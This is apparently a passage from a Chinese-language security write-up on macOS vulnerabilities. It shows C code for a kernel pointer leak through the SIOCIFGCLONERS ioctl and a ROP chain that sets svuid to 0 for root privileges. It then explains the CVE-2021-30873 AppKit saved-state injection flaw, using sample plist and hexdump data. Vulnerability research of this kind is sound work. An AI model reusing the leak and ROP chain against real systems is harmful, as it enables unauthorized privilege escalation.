<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">fileops</span> <span class="title">socketops</span> =</span> &#123;</span><br><span class="line">    DTYPE_SOCKET,</span><br><span class="line">    soo_read,</span><br><span class="line">    soo_write,</span><br><span class="line">    soo_ioctl,</span><br><span class="line">    soo_select,</span><br><span class="line">    soo_close,</span><br><span class="line">    soo_kqfilter,</span><br><span class="line">    soo_drain</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>看ifioctl的源码，找调用的ioctl：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span></span><br><span class="line"><span class="title function_">ifioctl</span><span class="params">(<span class="keyword">struct</span> socket *so, u_long cmd, <span class="type">caddr_t</span> data, <span class="keyword">struct</span> proc *p)</span></span><br><span class="line">&#123;</span><br><span class="line">...</span><br><span class="line">    <span class="keyword">switch</span> (cmd) &#123;</span><br><span class="line">    <span class="keyword">case</span> OSIOCGIFCONF32:            <span class="comment">/* struct ifconf32 */</span></span><br><span class="line">    <span class="keyword">case</span> SIOCGIFCONF32:             <span class="comment">/* struct ifconf32 */</span></span><br><span class="line">    <span class="keyword">case</span> SIOCGIFCONF64:             <span class="comment">/* struct ifconf64 */</span></span><br><span class="line">    <span class="keyword">case</span> OSIOCGIFCONF64:            <span class="comment">/* struct ifconf64 */</span></span><br><span class="line">        error = ifioctl_ifconf(cmd, data);</span><br><span class="line">        <span class="keyword">goto</span> done;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">case</span> SIOCIFGCLONERS32:          <span class="comment">/* struct if_clonereq32 */</span></span><br><span class="line">    <span class="keyword">case</span> SIOCIFGCLONERS64:          <span class="comment">/* struct if_clonereq64 */</span></span><br><span class="line">        error = ifioctl_ifclone(cmd, data);</span><br><span class="line">        <span class="keyword">goto</span> done;</span><br><span class="line">...</span><br><span class="line">    &#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过上面的源码，可以找到SIOCIFGCLONERS命令，该命令结合一个结构体if_clonereq就可以了。</p>
<p>通过下面的代码，获取内核信息：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> sockfd = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line"><span class="type">char</span> buffer[IFNAMSIZ];</span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">if_clonereq</span> <span class="title">ifcr</span> =</span> &#123;</span><br><span class="line">    .ifcr_count  = <span class="number">1</span>,</span><br><span class="line">    .ifcr_buffer = buffer,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">int</span> err = ioctl(sockfd, SIOCIFGCLONERS, &amp;ifcr);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;0x%016llx\n&quot;</span>, *(<span class="type">uint64_t</span> *)(buffer + <span class="number">8</span>));</span><br></pre></td></tr></table></figure>

<p>如果幸运的话，泄漏的地址类似0xffffff801873487f这种，低21位（0x3487f）是对的。使用otool查找内核，发现一条指令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">_ledger_credit+95:</span><br><span class="line">ffffff800033487f        mov    eax, r14d</span><br></pre></td></tr></table></figure>

<p>两者相减，就能得到内核偏移。</p>
<h2 id="构建ROP"><a href="#构建ROP" class="headerlink" title="构建ROP"></a>构建ROP</h2><p>使用<a target="_blank" rel="noopener" href="https://github.com/JonathanSalwan/ROPgadget">ROPgadget</a>在内核镜像中查找ROP。这里 <code>current_proc</code>等都是函数，ret到函数上，没什么问题：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">uint64_t</span> * vtable = (<span class="type">uint64_t</span> *)payload_addr;</span><br><span class="line"><span class="type">uint64_t</span> * rop_stack = ((<span class="type">uint64_t</span> *)(payload_addr + size)) - <span class="number">8</span>;</span><br><span class="line"><span class="comment">/* Virtual method 4 is called in the kernel with rax set to 0. */</span></span><br><span class="line">vtable[<span class="number">0</span>] = (<span class="type">uint64_t</span>)rop_stack;        <span class="comment">/*  *0 = rop_stack                  */</span></span><br><span class="line">vtable[<span class="number">4</span>] = xchg_esp_eax_pop_rsp;       <span class="comment">/*  rsp = 0; rsp = *rsp; start rop  */</span></span><br><span class="line">rop_stack[<span class="number">0</span>] = current_proc;            <span class="comment">/*  rax = &amp;proc                     */</span></span><br><span class="line">rop_stack[<span class="number">1</span>] = xchg_rax_rdi;            <span class="comment">/*  rdi = &amp;proc                     */</span></span><br><span class="line">rop_stack[<span class="number">2</span>] = proc_ucred;              <span class="comment">/*  rax = &amp;cred                     */</span></span><br><span class="line">rop_stack[<span class="number">3</span>] = xchg_rax_rdi;            <span class="comment">/*  rdi = &amp;cred                     */</span></span><br><span class="line">rop_stack[<span class="number">4</span>] = posix_cred_get;          <span class="comment">/*  rax = &amp;posix_cred               */</span></span><br><span class="line">rop_stack[<span class="number">5</span>] = xchg_rax_rdi;            <span class="comment">/*  rdi = &amp;posix_cred               */</span></span><br><span class="line">rop_stack[<span class="number">6</span>] = set_svuid_0;             <span class="comment">/*  we are now setuid 0             */</span></span><br><span class="line">rop_stack[<span class="number">7</span>] = thread_exception_return; <span class="comment">/*  stop rop </span></span><br></pre></td></tr></table></figure>

<h1 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h1><p>漏洞利用有的时候会崩溃，原因是rax为0，改进方式是在0处分配假的vtable，实现方式是将exp编译为32位，以支持映射NULL page，同时还要使用一些特殊的链接标志，以使mach-o文件不会有一个__PAGEZERO节。</p>
<h1 id="CVE-2021-30873"><a href="#CVE-2021-30873" class="headerlink" title="CVE-2021-30873"></a>CVE-2021-30873</h1><p>一个影响基于AppKit开发的应用程序的进程注入漏洞。</p>
<h2 id="影响范围-1"><a href="#影响范围-1" class="headerlink" title="影响范围"></a>影响范围</h2><p>macOS 11.3之前。</p>
<h2 id="漏洞原理-1"><a href="#漏洞原理-1" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>漏洞出现在Mac的状态保存机制上，状态保存用于重启后恢复应用程序的状态，或者，将在Dock中的长时间不使用的应用程序关闭掉（虽然看上去Dock中的图标和界面都在，实际上只是一个图片），在应用程序被点击后再依据保存的状态进行恢复。</p>
<p>当使用AppKit开发时，状态保存功能是自动被添加的，所以这个漏洞和AppKit有关。</p>
<p>状态保存需要写入两个文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">~/Library/Saved Application State/&lt;Bundle ID&gt;.savedState/windows.plist</span><br><span class="line">~/Library/Saved Application State/&lt;Bundle ID&gt;.savedState/data.data</span><br></pre></td></tr></table></figure>

<p>plist文件类似下面这种：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">plist</span> <span class="keyword">PUBLIC</span> <span class="string">&quot;-//Apple//DTD PLIST 1.0//EN&quot;</span> <span class="string">&quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">plist</span> <span class="attr">version</span>=<span class="string">&quot;1.0&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">array</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>MenuBar AvailableSpace<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">real</span>&gt;</span>1248<span class="tag">&lt;/<span class="name">real</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSDataKey<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">data</span>&gt;</span></span><br><span class="line">		Ay1IqBriwup4bKAanpWcEw==</span><br><span class="line">		<span class="tag">&lt;/<span class="name">data</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSIsMainMenuBar<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">true</span>/&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowID<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>1<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowNumber<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>5978<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSDataKey<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">data</span>&gt;</span></span><br><span class="line">		5lyzOSsKF24yEcwAKTBSVw==</span><br><span class="line">		<span class="tag">&lt;/<span class="name">data</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSDragRegion<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">data</span>&gt;</span></span><br><span class="line">		AAAAgAIAAADAAQAABAAAAAMAAABHAgAAxgEAAAoAAAADAAAABwAAABUAAAAb</span><br><span class="line">		AAAAKQAAAC8AAAA9AAAARwIAAMcBAAAMAAAAAwAAAAcAAAAVAAAAGwAAACkA</span><br><span class="line">		AAAvAAAAPQAAAAkBAABLAQAARwIAANABAAAKAAAAFQAAABsAAAApAAAALwAA</span><br><span class="line">		AD0AAAAJAQAASwEAAD4CAADWAQAABgAAAAwAAAAJAQAASwEAAD4CAADXAQAA</span><br><span class="line">		BAAAAAwAAAA+AgAA2QEAAAIAAAD///9/</span><br><span class="line">		<span class="tag">&lt;/<span class="name">data</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSTitle<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>Untitled<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSUIID<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>_NS:34<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowCloseButtonFrame<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>&#123;&#123;7, 454&#125;, &#123;14, 16&#125;&#125;<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowFrame<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>177 501 586 476 0 0 1680 1025 <span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowID<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>2<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowLevel<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>0<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowMiniaturizeButtonFrame<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>&#123;&#123;27, 454&#125;, &#123;14, 16&#125;&#125;<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowNumber<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>5982<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowWorkspaceID<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span><span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowZoomButtonFrame<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>&#123;&#123;47, 454&#125;, &#123;14, 16&#125;&#125;<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>CFBundleVersion<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">string</span>&gt;</span>378<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSDataKey<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">data</span>&gt;</span></span><br><span class="line">		P7BYxMryj6Gae9Q76wpqVw==</span><br><span class="line">		<span class="tag">&lt;/<span class="name">data</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSDockMenu<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">array</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>command<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>1<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>mark<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>2<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>name<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">string</span>&gt;</span>Untitled<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>system-icon<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>1735879022<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>tag<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>2<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>separator<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">true</span>/&gt;</span></span><br><span class="line">			<span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>command<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>2<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>indent<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>0<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>name<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">string</span>&gt;</span>New Document<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">key</span>&gt;</span>tag<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">integer</span>&gt;</span>0<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">array</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSExecutableInode<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>1152921500311961010<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSIsGlobal<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">true</span>/&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSSystemAppearance<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">data</span>&gt;</span></span><br><span class="line">		YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9i</span><br><span class="line">		amVjdHMSAAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGkCwwRElUk</span><br><span class="line">		bnVsbNINDg8QViRjbGFzc18QEE5TQXBwZWFyYW5jZU5hbWWAA4ACXxAUTlNB</span><br><span class="line">		cHBlYXJhbmNlTmFtZUFxdWHSExQVFlokY2xhc3NuYW1lWCRjbGFzc2VzXE5T</span><br><span class="line">		QXBwZWFyYW5jZaIVF1hOU09iamVjdAgRGiQpMjdJTFFTWF5jan1/gZidqLG+</span><br><span class="line">		wQAAAAAAAAEBAAAAAAAAABgAAAAAAAAAAAAAAAAAAADK</span><br><span class="line">		<span class="tag">&lt;/<span class="name">data</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSSystemVersion<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">array</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">integer</span>&gt;</span>12<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">integer</span>&gt;</span>2<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">integer</span>&gt;</span>1<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">array</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowID<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">integer</span>&gt;</span>4294967295<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">key</span>&gt;</span>NSWindowZOrder<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">array</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">integer</span>&gt;</span>5982<span class="tag">&lt;/<span class="name">integer</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">array</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">array</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">plist</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>data.data文件包含自定义二进制格式，包含一系列的记录，每个记录包含AES-CBC加密的序列化对象。windows.plist文件则包含和记录相对应的key (<code>NSDataKey</code>)和ID(<code>NSWindowID</code>)。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000</span>  <span class="number">4</span>e <span class="number">53</span> <span class="number">43</span> <span class="number">52</span> <span class="number">31</span> <span class="number">30</span> <span class="number">30</span> <span class="number">30</span>  <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">01</span> <span class="number">00</span> <span class="number">00</span> <span class="number">01</span> b0  |NSCR1000........|</span><br><span class="line"><span class="number">00000010</span>  ec f2 <span class="number">26</span> b9 <span class="number">8b</span> <span class="number">06</span> c8 d0  <span class="number">41</span> <span class="number">5</span>d <span class="number">73</span> <span class="number">7</span>a <span class="number">0</span>e cc <span class="number">59</span> <span class="number">74</span>  |..&amp;.....A]sz..Yt|</span><br><span class="line"><span class="number">00000020</span>  <span class="number">89</span> ac <span class="number">3</span>d b3 b6 <span class="number">7</span>a ab <span class="number">1b</span>  bb f7 <span class="number">84</span> <span class="number">0</span>c <span class="number">05</span> <span class="number">57</span> <span class="number">4</span>d <span class="number">70</span>  |..=..z.......WMp|</span><br><span class="line"><span class="number">00000030</span>  cb <span class="number">55</span> <span class="number">7f</span> ee <span class="number">71</span> f8 <span class="number">8b</span> bb  d4 fd b0 c6 <span class="number">28</span> <span class="number">14</span> <span class="number">78</span> <span class="number">23</span>  |.U..q.......(.x#|</span><br><span class="line"><span class="number">00000040</span>  ed <span class="number">89</span> <span class="number">30</span> <span class="number">29</span> <span class="number">92</span> <span class="number">8</span>c <span class="number">80</span> bf  <span class="number">47</span> <span class="number">75</span> <span class="number">28</span> <span class="number">50</span> d7 <span class="number">1</span>c <span class="number">9</span>a <span class="number">8</span>a  |.<span class="number">.0</span>)....Gu(P....|</span><br><span class="line"><span class="number">00000050</span>  <span class="number">94</span> b4 d1 c1 <span class="number">5</span>d <span class="number">9</span>e <span class="number">1</span>a e0  <span class="number">46</span> <span class="number">62</span> f5 <span class="number">16</span> <span class="number">76</span> f5 <span class="number">6f</span> df  |....]...Fb..v.o.|</span><br><span class="line"><span class="number">00000060</span>  <span class="number">43</span> a5 fa <span class="number">7</span>a dd d3 <span class="number">2f</span> <span class="number">25</span>  <span class="number">43</span> <span class="number">04</span> ba e2 <span class="number">7</span>c <span class="number">59</span> f9 e8  |C..z../%C...|Y..|</span><br><span class="line"><span class="number">00000070</span>  a4 <span class="number">0</span>e <span class="number">11</span> <span class="number">5</span>d <span class="number">8</span>e <span class="number">86</span> <span class="number">16</span> f0  c5 <span class="number">1</span>d ac fb <span class="number">5</span>c <span class="number">71</span> fd <span class="number">9</span>d  |...]........\q..|</span><br><span class="line"><span class="number">00000080</span>  <span class="number">81</span> <span class="number">90</span> c8 e7 <span class="number">2</span>d <span class="number">53</span> <span class="number">75</span> <span class="number">43</span>  <span class="number">6</span>d eb b6 aa c7 <span class="number">15</span> <span class="number">8b</span> <span class="number">1</span>a  |....-SuCm.......|</span><br><span class="line"><span class="number">00000090</span>  <span class="number">9</span>c <span class="number">58</span> <span class="number">8f</span> <span class="number">19</span> <span class="number">02</span> <span class="number">1</span>a <span class="number">73</span> <span class="number">99</span>  ed <span class="number">66</span> d1 <span class="number">91</span> <span class="number">8</span>a <span class="number">84</span> <span class="number">32</span> <span class="number">7f</span>  |.X....s..f...<span class="number">.2</span>.|</span><br><span class="line"><span class="number">000000</span>a0  <span class="number">1f</span> <span class="number">5</span>a <span class="number">1</span>e e8 ae b3 <span class="number">39</span> a8  cf <span class="number">6b</span> <span class="number">96</span> ef d8 <span class="number">7b</span> d1 <span class="number">46</span>  |.Z...<span class="number">.9</span>..k...&#123;.F|</span><br><span class="line"><span class="number">000000b</span>0  <span class="number">0</span>c e2 <span class="number">97</span> d5 db d4 <span class="number">9</span>d eb  d6 <span class="number">13</span> <span class="number">05</span> <span class="number">7</span>d e0 <span class="number">4</span>a <span class="number">89</span> a4  